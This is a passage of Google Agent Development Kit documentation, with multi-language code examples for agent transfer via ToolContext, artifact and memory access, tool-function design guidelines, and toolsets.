	"google.golang.org/adk/model/gemini"
	"google.golang.org/adk/runner"
	"google.golang.org/adk/session"
	"google.golang.org/adk/tool"
	"google.golang.org/adk/tool/functiontool"
	"google.golang.org/genai"
)

type checkAndTransferArgs struct {
	Query string `json:"query" jsonschema:"The user's query to check for urgency."`
}

type checkAndTransferResult struct {
	Status string `json:"status"`
}

func checkAndTransfer(ctx tool.Context, args checkAndTransferArgs) (checkAndTransferResult, error) {
	if strings.Contains(strings.ToLower(args.Query), "urgent") {
		fmt.Println("Tool: Detected urgency, transferring to the support agent.")
		ctx.Actions().TransferToAgent = "support_agent"
		return checkAndTransferResult{Status: "Transferring to the support agent..."}, nil
	}
	return checkAndTransferResult{Status: fmt.Sprintf("Processed query: '%s'. No further action needed.", args.Query)}, nil
}

func main() {
	ctx := context.Background()
	model, err := gemini.NewModel(ctx, "gemini-2.0-flash", &genai.ClientConfig{})
	if err != nil {
		log.Fatal(err)
	}

	supportAgent, err := llmagent.New(llmagent.Config{
		Name:        "support_agent",
		Model:       model,
		Instruction: "You are the dedicated support agent. Mention that you are a support handler and help the user with their urgent issue.",
	})
	if err != nil {
		log.Fatal(err)
	}

	checkAndTransferTool, err := functiontool.New(
		functiontool.Config{
			Name:        "check_and_transfer",
			Description: "Checks if the query requires escalation and transfers to another agent if needed.",
		},
		checkAndTransfer,
	)
	if err != nil {
		log.Fatal(err)
	}

	mainAgent, err := llmagent.New(llmagent.Config{
		Name:        "main_agent",
		Model:       model,
		Instruction: "You are the first point of contact for customer support of an analytics tool. Answer general queries. If the user indicates urgency, use the 'check_and_transfer' tool.",
		Tools:       []tool.Tool{checkAndTransferTool},
		SubAgents:   []agent.Agent{supportAgent},
	})
	if err != nil {
		log.Fatal(err)
	}

	sessionService := session.InMemoryService()
	runner, err := runner.New(runner.Config{
		AppName:        "customer_support_agent",
		Agent:          mainAgent,
		SessionService: sessionService,
	})
	if err != nil {
		log.Fatal(err)
	}

	session, err := sessionService.Create(ctx, &session.CreateRequest{
		AppName: "customer_support_agent",
		UserID:  "user1234",
	})
	if err != nil {
		log.Fatal(err)
	}

	run(ctx, runner, session.Session.ID(), "this is urgent, i cant login")
}

func run(ctx context.Context, r *runner.Runner, sessionID string, prompt string) {
	fmt.Printf("\n> %s\n", prompt)
	events := r.Run(
		ctx,
		"user1234",
		sessionID,
		genai.NewContentFromText(prompt, genai.RoleUser),
		agent.RunConfig{
			StreamingMode: agent.StreamingModeNone,
		},
	)
	for event, err := range events {
		if err != nil {
			log.Fatalf("ERROR during agent execution: %v", err)
		}
		// Skip events that carry no content parts to avoid indexing an empty slice.
		if event.Content == nil || len(event.Content.Parts) == 0 {
			continue
		}
		if text := event.Content.Parts[0].Text; text != "" {
			fmt.Printf("Agent Response: %s\n", text)
		}
	}
}
```

```java
import com.google.adk.agents.LlmAgent;
import com.google.adk.runner.Runner;
import com.google.adk.sessions.InMemorySessionService;
import com.google.adk.sessions.Session;
import com.google.adk.tools.Annotations.Schema;
import com.google.adk.tools.FunctionTool;
import com.google.adk.tools.ToolContext;
import com.google.common.collect.ImmutableList;
import com.google.genai.types.Content;
import com.google.genai.types.Part;
import java.util.HashMap;
import java.util.Locale;
import java.util.Map;

public class CustomerSupportAgentApp {

  private static final String APP_NAME = "customer_support_agent";
  private static final String USER_ID = "user1234";
  private static final String SESSION_ID = "1234";
  private static final String MODEL_ID = "gemini-2.0-flash";

  /**
   * Checks if the query requires escalation and transfers to another agent if needed.
   *
   * @param query The user's query.
   * @param toolContext The context for the tool.
   * @return A map indicating the result of the check and transfer.
   */
  public static Map<String, Object> checkAndTransfer(
      @Schema(name = "query", description = "the user query") String query,
      @Schema(name = "toolContext", description = "the tool context") ToolContext toolContext) {
    Map<String, Object> response = new HashMap<>();
    if (query.toLowerCase(Locale.ROOT).contains("urgent")) {
      System.out.println("Tool: Detected urgency, transferring to the support agent.");
      toolContext.actions().setTransferToAgent("support_agent");
      response.put("status", "transferring");
      response.put("message", "Transferring to the support agent...");
    } else {
      response.put("status", "processed");
      response.put(
          "message", String.format("Processed query: '%s'. No further action needed.", query));
    }
    return response;
  }

  /**
   * Calls the agent with the given query and prints the final response.
   *
   * @param runner The runner to use.
   * @param query The query to send to the agent.
   */
  public static void callAgent(Runner runner, String query) {
    Content content = Content.fromParts(Part.fromText(query));

    InMemorySessionService sessionService = (InMemorySessionService) runner.sessionService();
    Session session =
        sessionService
            .createSession(APP_NAME, USER_ID, /* state= */ null, SESSION_ID)
            .blockingGet();

    runner
        .runAsync(session.userId(), session.id(), content)
        .forEach(
            event -> {
              // Print only the final response, and only if it carries a text part.
              if (event.finalResponse()
                  && event.content().isPresent()
                  && event.content().get().parts().isPresent()
                  && !event.content().get().parts().get().isEmpty()
                  && event.content().get().parts().get().get(0).text().isPresent()) {
                String finalResponse = event.content().get().parts().get().get(0).text().get();
                System.out.println("Agent Response: " + finalResponse);
              }
            });
  }

  public static void main(String[] args) throws NoSuchMethodException {
    FunctionTool escalationTool =
        FunctionTool.create(
            CustomerSupportAgentApp.class.getMethod(
                "checkAndTransfer", String.class, ToolContext.class));

    LlmAgent supportAgent =
        LlmAgent.builder()
            .model(MODEL_ID)
            .name("support_agent")
            .description("""
                The dedicated support agent.
                Mentions it is a support handler and helps the user with their urgent issue.
                """)
            .instruction("""
                You are the dedicated support agent.
                Mention that you are a support handler and help the user with their urgent issue.
                """)
            .build();

    LlmAgent mainAgent =
        LlmAgent.builder()
            .model(MODEL_ID)
            .name("main_agent")
            .description("""
                The first point of contact for customer support of an analytics tool.
                Answers general queries.
                If the user indicates urgency, uses the 'check_and_transfer' tool.
                """)
            .instruction("""
                You are the first point of contact for customer support of an analytics tool.
                Answer general queries.
                If the user indicates urgency, use the 'check_and_transfer' tool.
                """)
            .tools(ImmutableList.of(escalationTool))
            .subAgents(supportAgent)
            .build();
    // Sub-agents are attached through the builder when the main agent is constructed.

    InMemorySessionService sessionService = new InMemorySessionService();
    Runner runner = new Runner(mainAgent, APP_NAME, null, sessionService);

    // Agent Interaction
    callAgent(runner, "this is urgent, i cant login");
  }
}
```

##### Explanation

- We define two agents: `main_agent` and `support_agent`. The `main_agent` is designed to be the initial point of contact.
- The `check_and_transfer` tool, when called by `main_agent`, examines the user's query.
- If the query contains the word "urgent", the tool accesses the `tool_context`, specifically **`tool_context.actions`**, and sets the `transfer_to_agent` attribute to `support_agent`.
- This action signals the framework to **transfer control of the conversation to the agent named `support_agent`**.
- When the `main_agent` processes the urgent query, the `check_and_transfer` tool triggers the transfer. The subsequent response would ideally come from the `support_agent`.
- For a normal query without urgency, the tool simply processes it without triggering a transfer.

This example illustrates how a tool, through EventActions in its ToolContext, can dynamically influence the flow of the conversation by transferring control to another specialized agent.

### **Authentication**

ToolContext provides mechanisms for tools interacting with authenticated APIs. If your tool needs to handle authentication, you might use the following:

- **`auth_response`** (in Python): Contains credentials (e.g., a token) if authentication was already handled by the framework before your tool was called (common with RestApiTool and OpenAPI security schemes). In TypeScript, this is retrieved via the `getAuthResponse()` method.
- **`request_credential(auth_config: dict)`** (in Python) or **`requestCredential(authConfig: AuthConfig)`** (in TypeScript): Call this method if your tool determines authentication is needed but credentials aren't available. This signals the framework to start an authentication flow based on the provided `auth_config`.
- **`get_auth_response()`** (in Python) or **`getAuthResponse(authConfig: AuthConfig)`** (in TypeScript): Call this in a subsequent invocation (after `request_credential` was successfully handled) to retrieve the credentials the user provided.

For detailed explanations of authentication flows, configuration, and examples, please refer to the dedicated Tool Authentication documentation page.

### **Context-Aware Data Access Methods**

These methods provide convenient ways for your tool to interact with persistent data associated with the session or user, managed by configured services.

- **`list_artifacts()`** (in Python) or **`listArtifacts()`** (in Java and TypeScript): Returns a list of filenames (or keys) for all artifacts currently stored for the session via the `artifact_service`. Artifacts are typically files (images, documents, etc.) uploaded by the user or generated by tools/agents.
- **`load_artifact(filename: str)`**: Retrieves a specific artifact by its filename from the **artifact_service**. You can optionally specify a version; if omitted, the latest version is returned. Returns a `google.genai.types.Part` object containing the artifact data and mime type, or None if not found.
- **`save_artifact(filename: str, artifact: types.Part)`**: Saves a new version of an artifact to the `artifact_service`. Returns the new version number (starting from 0).
- **`search_memory(query: str)`**: (Supported in ADK Python, Go and TypeScript) Queries the user's long-term memory using the configured `memory_service`. This is useful for retrieving relevant information from past interactions or stored knowledge. The structure of the **SearchMemoryResponse** depends on the specific memory service implementation but typically contains relevant text snippets or conversation excerpts.

#### Example

```py
# Copyright 2025 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from google.adk.tools import ToolContext, FunctionTool
from google.genai import types


# The tool is declared async because it awaits artifact and memory calls.
async def process_document(
    document_name: str, analysis_query: str, tool_context: ToolContext
) -> dict:
    """Analyzes a document using context from memory."""

    # 1. Load the artifact
    print(f"Tool: Attempting to load artifact: {document_name}")
    document_part = await tool_context.load_artifact(document_name)

    if not document_part:
        return {"status": "error", "message": f"Document '{document_name}' not found."}

    document_text = document_part.text  # Assuming it's text for simplicity
    print(f"Tool: Loaded document '{document_name}' ({len(document_text)} chars).")

    # 2. Search memory for related context
    print(f"Tool: Searching memory for context related to: '{analysis_query}'")
    memory_response = await tool_context.search_memory(
        f"Context for analyzing document about {analysis_query}"
    )
    memory_context = "\n".join(
        [
            m.events[0].content.parts[0].text
            for m in memory_response.memories
            if m.events and m.events[0].content
        ]
    )  # Simplified extraction
    print(f"Tool: Found memory context: {memory_context[:100]}...")

    # 3. Perform analysis (placeholder)
    analysis_result = f"Analysis of '{document_name}' regarding '{analysis_query}' using memory context: [Placeholder Analysis Result]"
    print("Tool: Performed analysis.")

    # 4. Save the analysis result as a new artifact
    analysis_part = types.Part.from_text(text=analysis_result)
    new_artifact_name = f"analysis_{document_name}"
    version = await tool_context.save_artifact(new_artifact_name, analysis_part)
    print(f"Tool: Saved analysis result as '{new_artifact_name}' version {version}.")

    return {
        "status": "success",
        "analysis_artifact": new_artifact_name,
        "version": version,
    }

doc_analysis_tool = FunctionTool(func=process_document)

# In an Agent:
# Assume artifact 'report.txt' was previously saved.
# Assume memory service is configured and has relevant past data.
# my_agent = Agent(..., tools=[doc_analysis_tool], artifact_service=..., memory_service=...)
```

```typescript
import { Part } from "@google/genai";
import { ToolContext } from "@google/adk";

// Analyzes a document using context from memory.
export async function processDocument(
  params: { documentName: string; analysisQuery: string },
  toolContext?: ToolContext
): Promise<Record<string, string>> {
  if (!toolContext) {
    throw new Error("ToolContext is required for this tool.");
  }

  // 1. List all available artifacts
  const artifacts = await toolContext.listArtifacts();
  console.log(`Listing all available artifacts: ${artifacts}`);

  // 2. Load an artifact
  console.log(`Tool: Attempting to load artifact: ${params.documentName}`);
  const documentPart = await toolContext.loadArtifact(params.documentName);
  if (!documentPart) {
    console.log(`Tool: Document '${params.documentName}' not found.`);
    return {
      status: "error",
      message: `Document '${params.documentName}' not found.`,
    };
  }

  const documentText = documentPart.text ?? "";
  console.log(
    `Tool: Loaded document '${params.documentName}' (${documentText.length} chars).`
  );

  // 3. Search memory for related context
  console.log(`Tool: Searching memory for context related to '${params.analysisQuery}'`);
  const memory_results = await toolContext.searchMemory(params.analysisQuery);
  console.log(`Tool: Found ${memory_results.memories.length} relevant memories.`);
  const context_from_memory = memory_results.memories
    .map((m) => m.content.parts[0].text)
    .join("\n");

  // 4. Perform analysis (placeholder)
  const analysisResult =
    `Analysis of '${params.documentName}' regarding '${params.analysisQuery}':\n` +
    `Context from Memory:\n${context_from_memory}\n` +
    `[Placeholder Analysis Result]`;
  console.log("Tool: Performed analysis.");

  // 5. Save the analysis result as a new artifact
  const analysisPart: Part = { text: analysisResult };
  const newArtifactName = `analysis_${params.documentName}`;
  await toolContext.saveArtifact(newArtifactName, analysisPart);
  console.log(`Tool: Saved analysis result to '${newArtifactName}'.`);

  return {
    status: "success",
    analysis_artifact: newArtifactName,
  };
}
```

```go
// Copyright 2025 Google LLC
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
//     http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package main import ( "fmt" "google.golang.org/adk/tool" "google.golang.org/genai" ) type processDocumentArgs struct { DocumentName string `json:"document_name" jsonschema:"The name of the document to be processed."` AnalysisQuery string `json:"analysis_query" jsonschema:"The query for the analysis."` } type processDocumentResult struct { Status string `json:"status"` AnalysisArtifact string `json:"analysis_artifact,omitempty"` Version int64 `json:"version,omitempty"` Message string `json:"message,omitempty"` } func processDocument(ctx tool.Context, args processDocumentArgs) (*processDocumentResult, error) { fmt.Printf("Tool: Attempting to load artifact: %s\n", args.DocumentName) // List all artifacts listResponse, err := ctx.Artifacts().List(ctx) if err != nil { return nil, fmt.Errorf("failed to list artifacts") } fmt.Println("Tool: Available artifacts:") for _, file := range listResponse.FileNames { fmt.Printf(" - %s\n", file) } documentPart, err := ctx.Artifacts().Load(ctx, args.DocumentName) if err != nil { return nil, fmt.Errorf("document '%s' not found", args.DocumentName) } fmt.Printf("Tool: Loaded document '%s' of size %d bytes.\n", args.DocumentName, len(documentPart.Part.InlineData.Data)) // 3. 
Search memory for related context fmt.Printf("Tool: Searching memory for context related to: '%s'\n", args.AnalysisQuery) memoryResp, err := ctx.SearchMemory(ctx, args.AnalysisQuery) if err != nil { fmt.Printf("Tool: Error searching memory: %v\n", err) } memoryResultCount := 0 if memoryResp != nil { memoryResultCount = len(memoryResp.Memories) } fmt.Printf("Tool: Found %d memory results.\n", memoryResultCount) analysisResult := fmt.Sprintf("Analysis of '%s' regarding '%s' using memory context: [Placeholder Analysis Result]", args.DocumentName, args.AnalysisQuery) fmt.Println("Tool: Performed analysis.") analysisPart := genai.NewPartFromText(analysisResult) newArtifactName := fmt.Sprintf("analysis_%s", args.DocumentName) version, err := ctx.Artifacts().Save(ctx, newArtifactName, analysisPart) if err != nil { return nil, fmt.Errorf("failed to save artifact") } fmt.Printf("Tool: Saved analysis result as '%s' version %d.\n", newArtifactName, version.Version) return &processDocumentResult{ Status: "success", AnalysisArtifact: newArtifactName, Version: version.Version, }, nil } ``` ```java // Analyzes a document using context from memory. // You can also list, load and save artifacts using Callback Context or LoadArtifacts tool. public static @NonNull Maybe<ImmutableMap<String, Object>> processDocument( @Annotations.Schema(description = "The name of the document to analyze.") String documentName, @Annotations.Schema(description = "The query for the analysis.") String analysisQuery, ToolContext toolContext) { // 1. List all available artifacts System.out.printf( "Listing all available artifacts %s:", toolContext.listArtifacts().blockingGet()); // 2. 
Load an artifact to memory System.out.println("Tool: Attempting to load artifact: " + documentName); Part documentPart = toolContext.loadArtifact(documentName, Optional.empty()).blockingGet(); if (documentPart == null) { System.out.println("Tool: Document '" + documentName + "' not found."); return Maybe.just( ImmutableMap.of( "status", "error", "message", "Document '" + documentName + "' not found.")); } String documentText = documentPart.text().orElse(""); System.out.println( "Tool: Loaded document '" + documentName + "' (" + documentText.length() + " chars)."); // 3. Perform analysis (placeholder) String analysisResult = "Analysis of '" + documentName + "' regarding '" + analysisQuery + "' [Placeholder Analysis Result]"; System.out.println("Tool: Performed analysis."); // 4. Save the analysis result as a new artifact Part analysisPart = Part.fromText(analysisResult); String newArtifactName = "analysis_" + documentName; toolContext.saveArtifact(newArtifactName, analysisPart); return Maybe.just( ImmutableMap.<String, Object>builder() .put("status", "success") .put("analysis_artifact", newArtifactName) .build()); } // FunctionTool processDocumentTool = // FunctionTool.create(ToolContextArtifactExample.class, "processDocument"); // In the Agent, include this function tool. // LlmAgent agent = LlmAgent.builder().tools(processDocumentTool).build(); ``` By leveraging the **ToolContext**, developers can create more sophisticated and context-aware custom tools that seamlessly integrate with ADK's architecture and enhance the overall capabilities of their agents. ## Defining Effective Tool Functions When using a method or function as an ADK Tool, how you define it significantly impacts the agent's ability to use it correctly. The agent's Large Language Model (LLM) relies heavily on the function's **name**, **parameters (arguments)**, **type hints**, and **docstring** / **source code comments** to understand its purpose and generate the correct call. 
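To make this concrete, the following sketch shows which parts of a Python function definition carry information a model could use. It is an illustration only, built on the standard library: `describe_tool` and `get_weather` are hypothetical names, and this is not how ADK actually generates its tool schema.

```python
import inspect
from typing import get_type_hints


def describe_tool(func) -> dict:
    """Builds a simplified, illustrative description of a tool function.

    NOT ADK's real schema generator; it only collects the name, docstring,
    and typed parameters that a model would rely on.
    """
    hints = get_type_hints(func)
    parameters = {}
    for name in inspect.signature(func).parameters:
        # Implicit or injected parameters are hidden from the model.
        if name in ("self", "cls", "tool_context"):
            continue
        param_type = hints.get(name)
        parameters[name] = getattr(param_type, "__name__", str(param_type))
    return {
        "name": func.__name__,
        "description": inspect.getdoc(func) or "",
        "parameters": parameters,
    }


def get_weather(city: str, days: int) -> dict:
    """Returns a weather forecast for a city over a number of days."""
    return {"status": "success", "city": city, "days": days}


tool_description = describe_tool(get_weather)
print(tool_description)
```

A function with a vague name, untyped parameters, or no docstring would produce a correspondingly empty description, which is why each of these elements matters.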
Here are key guidelines for defining effective tool functions: - **Function Name:** - Use descriptive, verb-noun names that clearly indicate the action (e.g., `get_weather`, `searchDocuments`, `schedule_meeting`). - Avoid generic names like `run`, `process`, `handle_data`, or overly ambiguous names like `doStuff`. Even with a good description, a name like `do_stuff` might confuse the model about when to use the tool versus, for example, `cancelFlight`. - The LLM uses the function name as a primary identifier during tool selection. - **Parameters (Arguments):** - Your function can have any number of parameters. - Use clear and descriptive names (e.g., `city` instead of `c`, `search_query` instead of `q`). - **Provide type hints in Python** for all parameters (e.g., `city: str`, `user_id: int`, `items: list[str]`). This is essential for ADK to generate the correct schema for the LLM. - Ensure all parameter types are **JSON serializable**. All Java primitives as well as standard Python types like `str`, `int`, `float`, `bool`, `list`, `dict`, and their combinations are generally safe. Avoid complex custom class instances as direct parameters unless they have a clear JSON representation. - **Do not set default values** for parameters. For example, avoid `def my_func(param1: str = "default")`. Default values are not reliably supported or used by the underlying models during function call generation. All necessary information should be derived by the LLM from the context or explicitly requested if missing. - **`self` / `cls` Handled Automatically:** Implicit parameters like `self` (for instance methods) or `cls` (for class methods) are automatically handled by ADK and excluded from the schema shown to the LLM. You only need to define type hints and descriptions for the logical parameters your tool requires the LLM to provide. - **Return Type:** - The function's return value **must be a dictionary (`dict`)** in Python, a **Map** in Java, or a plain **object** in TypeScript. 
- If your function returns a non-dictionary type (e.g., a string, number, list), the ADK framework will automatically wrap it into a dictionary/Map like `{'result': your_original_return_value}` before passing the result back to the model. - Design the dictionary/Map keys and values to be **descriptive and easily understood *by the LLM***. Remember, the model reads this output to decide its next step. - Include meaningful keys. For example, instead of returning just an error code like `500`, return `{'status': 'error', 'error_message': 'Database connection failed'}`. - It's a **highly recommended practice** to include a `status` key (e.g., `'success'`, `'error'`, `'pending'`, `'ambiguous'`) to clearly indicate the outcome of the tool execution for the model. - **Docstring / Source Code Comments:** - **This is critical.** The docstring is the primary source of descriptive information for the LLM. - **Clearly state what the tool *does*.** Be specific about its purpose and limitations. - **Explain *when* the tool should be used.** Provide context or example scenarios to guide the LLM's decision-making. - **Describe *each parameter* clearly.** Explain what information the LLM needs to provide for that argument. - Describe the **structure and meaning of the expected `dict` return value**, especially the different `status` values and associated data keys. - **Do not describe the injected ToolContext parameter**. Avoid mentioning the optional `tool_context: ToolContext` parameter within the docstring description since it is not a parameter the LLM needs to know about. ToolContext is injected by ADK, *after* the LLM decides to call it. **Example of a good definition:** ```python def lookup_order_status(order_id: str) -> dict: """Fetches the current status of a customer's order using its ID. Use this tool ONLY when a user explicitly asks for the status of a specific order and provides the order ID. Do not use it for general inquiries. 
Args: order_id: The unique identifier of the order to look up. Returns: A dictionary indicating the outcome. On success, status is 'success' and includes an 'order' dictionary. On failure, status is 'error' and includes an 'error_message'. Example success: {'status': 'success', 'order': {'state': 'shipped', 'tracking_number': '1Z9...'}} Example error: {'status': 'error', 'error_message': 'Order ID not found.'} """ # ... function implementation to fetch status ... if status_details := fetch_status_from_backend(order_id): return { "status": "success", "order": { "state": status_details.state, "tracking_number": status_details.tracking, }, } else: return {"status": "error", "error_message": f"Order ID {order_id} not found."} ``` ```typescript /** * Fetches the current status of a customer's order using its ID. * * Use this tool ONLY when a user explicitly asks for the status of * a specific order and provides the order ID. Do not use it for * general inquiries. * * @param params The parameters for the function. * @param params.order_id The unique identifier of the order to look up. * @returns A dictionary indicating the outcome. * On success, status is 'success' and includes an 'order' dictionary. * On failure, status is 'error' and includes an 'error_message'. * Example success: {'status': 'success', 'order': {'state': 'shipped', 'tracking_number': '1Z9...'}} * Example error: {'status': 'error', 'error_message': 'Order ID not found.'} */ async function lookupOrderStatus(params: { order_id: string }): Promise<Record<string, unknown>> { // ... function implementation to fetch status from a backend ... 
const status_details = await fetchStatusFromBackend(params.order_id); if (status_details) { return { "status": "success", "order": { "state": status_details.state, "tracking_number": status_details.tracking, }, }; } else { return { "status": "error", "error_message": `Order ID ${params.order_id} not found.` }; } } // Placeholder for a backend call async function fetchStatusFromBackend(order_id: string): Promise<{state: string, tracking: string} | null> { if (order_id === "12345") { return { state: "shipped", tracking: "1Z9..." }; } return null; } ``` ```go import ( "fmt" "google.golang.org/adk/tool" ) type lookupOrderStatusArgs struct { OrderID string `json:"order_id" jsonschema:"The ID of the order to look up."` } type order struct { State string `json:"state"` TrackingNumber string `json:"tracking_number"` } type lookupOrderStatusResult struct { Status string `json:"status"` Order order `json:"order,omitempty"` } func lookupOrderStatus(ctx tool.Context, args lookupOrderStatusArgs) (*lookupOrderStatusResult, error) { // ... function implementation to fetch status ... statusDetails, ok := fetchStatusFromBackend(args.OrderID) if !ok { return nil, fmt.Errorf("order ID %s not found", args.OrderID) } return &lookupOrderStatusResult{ Status: "success", Order: order{ State: statusDetails.State, TrackingNumber: statusDetails.Tracking, }, }, nil } ``` ```java /** * Retrieves the current weather report for a specified city. * * @param city The city for which to retrieve the weather report. * @param toolContext The context for the tool. * @return A dictionary containing the weather information. 
*/ public static Map<String, Object> getWeatherReport(String city, ToolContext toolContext) { Map<String, Object> response = new HashMap<>(); if (city.toLowerCase(Locale.ROOT).equals("london")) { response.put("status", "success"); response.put( "report", "The current weather in London is cloudy with a temperature of 18 degrees Celsius and a" + " chance of rain."); } else if (city.toLowerCase(Locale.ROOT).equals("paris")) { response.put("status", "success"); response.put("report", "The weather in Paris is sunny with a temperature of 25 degrees Celsius."); } else { response.put("status", "error"); response.put("error_message", String.format("Weather information for '%s' is not available.", city)); } return response; } ``` - **Simplicity and Focus:** - **Keep Tools Focused:** Each tool should ideally perform one well-defined task. - **Fewer Parameters are Better:** Models generally handle tools with fewer, clearly defined parameters more reliably than those with many optional or complex ones. - **Use Simple Data Types:** Prefer basic types (`str`, `int`, `bool`, `float`, `List[str]` in **Python**; `int`, `byte`, `short`, `long`, `float`, `double`, `boolean` and `char` in **Java**; or `string`, `number`, `boolean`, and arrays like `string[]` in **TypeScript**) over complex custom classes or deeply nested structures as parameters when possible. - **Decompose Complex Tasks:** Break down functions that perform multiple distinct logical steps into smaller, more focused tools. For instance, instead of a single `update_user_profile(profile: ProfileObject)` tool, consider separate tools like `update_user_name(name: str)`, `update_user_address(address: str)`, `update_user_preferences(preferences: list[str])`, etc. This makes it easier for the LLM to select and use the correct capability. By adhering to these guidelines, you provide the LLM with the clarity and structure it needs to effectively utilize your custom function tools, leading to more capable and reliable agent behavior. 
## Toolsets: Grouping and Dynamically Providing Tools Supported in ADK: Python v0.5.0, TypeScript v0.2.0 Beyond individual tools, ADK introduces the concept of a **Toolset** via the `BaseToolset` interface (defined in `google.adk.tools.base_toolset`). A toolset allows you to manage and provide a collection of `BaseTool` instances, often dynamically, to an agent. This approach is beneficial for: - **Organizing Related Tools:** Grouping tools that serve a common purpose (e.g., all tools for mathematical operations, or all tools interacting with a specific API). - **Dynamic Tool Availability:** Enabling an agent to have different tools available based on the current context (e.g., user permissions, session state, or other runtime conditions). The `get_tools` method of a toolset can decide which tools to expose. - **Integrating External Tool Providers:** Toolsets can act as adapters for tools coming from external systems, like an OpenAPI specification or an MCP server, converting them into ADK-compatible `BaseTool` objects. ### The `BaseToolset` Interface Any class acting as a toolset in ADK should implement the `BaseToolset` abstract base class. This interface primarily defines two methods: - **`async def get_tools(...) -> list[BaseTool]:`** This is the core method of a toolset. When an ADK agent needs to know its available tools, it will call `get_tools()` on each `BaseToolset` instance provided in its `tools` list. - It receives an optional `readonly_context` (an instance of `ReadonlyContext`). This context provides read-only access to information like the current session state (`readonly_context.state`), agent name, and invocation ID. The toolset can use this context to dynamically decide which tools to return. - It **must** return a `list` of `BaseTool` instances (e.g., `FunctionTool`, `RestApiTool`). 
- **`async def close(self) -> None:`** This asynchronous method is called by the ADK framework when the toolset is no longer needed, for example, when an agent server is shutting down or the `Runner` is being closed. Implement this method to perform any necessary cleanup, such as closing network connections, releasing file handles, or cleaning up other resources managed by the toolset. ### Using Toolsets with Agents You can include instances of your `BaseToolset` implementations directly in an `LlmAgent`'s `tools` list, alongside individual `BaseTool` instances. When the agent initializes or needs to determine its available capabilities, the ADK framework will iterate through the `tools` list: - If an item is a `BaseTool` instance, it's used directly. - If an item is a `BaseToolset` instance, its `get_tools()` method is called (with the current `ReadonlyContext`), and the returned list of `BaseTool`s is added to the agent's available tools. ### Example: A Simple Math Toolset Let's create a basic example of a toolset that provides simple arithmetic operations. ```py # 1. Define the individual tool functions def add_numbers(a: int, b: int, tool_context: ToolContext) -> Dict[str, Any]: """Adds two integer numbers. Args: a: The first number. b: The second number. Returns: A dictionary with the sum, e.g., {'status': 'success', 'result': 5} """ print(f"Tool: add_numbers called with a={a}, b={b}") result = a + b # Example: Storing something in tool_context state tool_context.state["last_math_operation"] = "addition" return {"status": "success", "result": result} def subtract_numbers(a: int, b: int) -> Dict[str, Any]: """Subtracts the second number from the first. Args: a: The first number. b: The second number. Returns: A dictionary with the difference, e.g., {'status': 'success', 'result': 1} """ print(f"Tool: subtract_numbers called with a={a}, b={b}") return {"status": "success", "result": a - b} # 2. 
Create the Toolset by implementing BaseToolset class SimpleMathToolset(BaseToolset): def __init__(self, prefix: str = "math_"): self.prefix = prefix # Create FunctionTool instances once self._add_tool = FunctionTool( func=add_numbers, name=f"{self.prefix}add_numbers", # Toolset can customize names ) self._subtract_tool = FunctionTool( func=subtract_numbers, name=f"{self.prefix}subtract_numbers" ) print(f"SimpleMathToolset initialized with prefix '{self.prefix}'") async def get_tools( self, readonly_context: Optional[ReadonlyContext] = None ) -> List[BaseTool]: print(f"SimpleMathToolset.get_tools() called.") # Example of dynamic behavior: # Could use readonly_context.state to decide which tools to return # For instance, if readonly_context.state.get("enable_advanced_math"): # return [self._add_tool, self._subtract_tool, self._multiply_tool] # For this simple example, always return both tools tools_to_return = [self._add_tool, self._subtract_tool] print(f"SimpleMathToolset providing tools: {[t.name for t in tools_to_return]}") return tools_to_return async def close(self) -> None: # No resources to clean up in this simple example print(f"SimpleMathToolset.close() called for prefix '{self.prefix}'.") await asyncio.sleep(0) # Placeholder for async cleanup if needed # 3. Define an individual tool (not part of the toolset) def greet_user(name: str = "User") -> Dict[str, str]: """Greets the user.""" print(f"Tool: greet_user called with name={name}") return {"greeting": f"Hello, {name}!"} greet_tool = FunctionTool(func=greet_user) # 4. Instantiate the toolset math_toolset_instance = SimpleMathToolset(prefix="calculator_") # 5. Define an agent that uses both the individual tool and the toolset calculator_agent = LlmAgent( name="CalculatorAgent", model="gemini-2.0-flash", # Replace with your desired model instruction="You are a helpful calculator and greeter. " "Use 'greet_user' for greetings. 
" "Use 'calculator_add_numbers' to add and 'calculator_subtract_numbers' to subtract. " "Announce the state of 'last_math_operation' if it's set.", tools=[greet_tool, math_toolset_instance], # Individual tool # Toolset instance ) ``` ```typescript /** * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import { LlmAgent, FunctionTool, ToolContext, BaseToolset, InMemoryRunner, isFinalResponse, BaseTool, stringifyContent } from "@google/adk"; import { z } from "zod"; import { Content, createUserContent } from "@google/genai"; function addNumbers(params: { a: number; b: number }, toolContext?: ToolContext): Record { if (!toolContext) { throw new Error("ToolContext is required for this tool."); } const result = params.a + params.b; toolContext.state.set("last_math_result", result); return { result: result }; } function subtractNumbers(params: { a: number; b: number }): Record { return { result: params.a - params.b }; } function greetUser(params: { name: string }): Record { return { greeting: `Hello, ${params.name}!` }; } class SimpleMathToolset extends BaseToolset { private readonly tools: BaseTool[]; constructor(prefix = "") { super([]); // No filter this.tools = [ new FunctionTool({ name: `${prefix}add_numbers`, description: "Adds two numbers and stores the result in the session state.", parameters: z.object({ a: z.number(), b: z.number() }), execute: addNumbers, }), new FunctionTool({ name: `${prefix}subtract_numbers`, description: "Subtracts the second 
